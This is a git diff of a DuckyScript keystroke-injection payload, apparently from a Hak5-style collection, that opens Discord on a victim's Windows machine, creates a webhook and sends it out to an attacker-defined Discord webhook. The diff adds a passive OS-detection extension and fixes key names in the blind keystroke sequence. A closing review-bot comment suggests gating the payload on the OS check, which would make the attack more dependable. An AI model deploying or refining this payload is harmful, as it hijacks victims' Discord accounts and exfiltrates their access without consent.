commit
0bebb446fd
|
@ -1,25 +1,69 @@
|
||||||
REM ###############################################################
|
REM_BLOCK
|
||||||
REM # |
|
###############################################################
|
||||||
REM # Title : Create And Exfiltrate A Webhook Of Discord |
|
# #
|
||||||
REM # Author : Aleff |
|
# Title : Create And Exfiltrate A Webhook Of Discord #
|
||||||
REM # Version : 1.0 |
|
# Author : Aleff #
|
||||||
REM # Category : Exfiltration |
|
# Version : 1.0 #
|
||||||
REM # Target : Windows 10-11 |
|
# Category : Exfiltration #
|
||||||
REM # |
|
# Target : Windows 10-11 #
|
||||||
REM ###############################################################
|
# #
|
||||||
|
###############################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
|
||||||
REM Requirements:
|
REM Requirements:
|
||||||
REM - Internet connection
|
REM - Internet connection
|
||||||
REM - Discord Installed
|
REM - Discord Installed
|
||||||
|
|
||||||
|
|
||||||
REM You must define the Discord server name i.e. Hak5
|
REM You must define the Discord server name i.e. Hak5
|
||||||
DEFINE #SERVER_NAME example
|
DEFINE #SERVER_NAME example
|
||||||
|
|
||||||
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
||||||
DEFINE #DISCORD_WEBHOOK example
|
DEFINE #DISCORD_WEBHOOK example
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
REM Open Discord app
|
REM Open Discord app
|
||||||
GUI
|
GUI
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
@ -74,11 +118,11 @@ TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
TAB
|
TAB
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
DOWN_ARROW
|
DOWNARROW
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
|
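Review bot: The embedded PASSIVE_WINDOWS_DETECT extension assigns `$_OS`, but the visible payload continues straight to `REM Open Discord app` / `GUI` without reading it, so a host left at `#NOT_WINDOWS` would still receive the blind `TAB`/`DOWNARROW`/`ENTER` sequence in whatever window has focus. The extension's own example block shows the intended gate: wrapping the payload body in `IF ($_OS == WINDOWS) THEN` … `END_IF` keeps it inert outside the `Target : Windows 10-11` scope stated in the header. The payload between the two hunks and after the second one is not shown, so such a check may already exist there. If it does not, a one-line `REM` after `END_EXTENSION` saying that `$_OS` must be checked before any keystrokes would record the requirement.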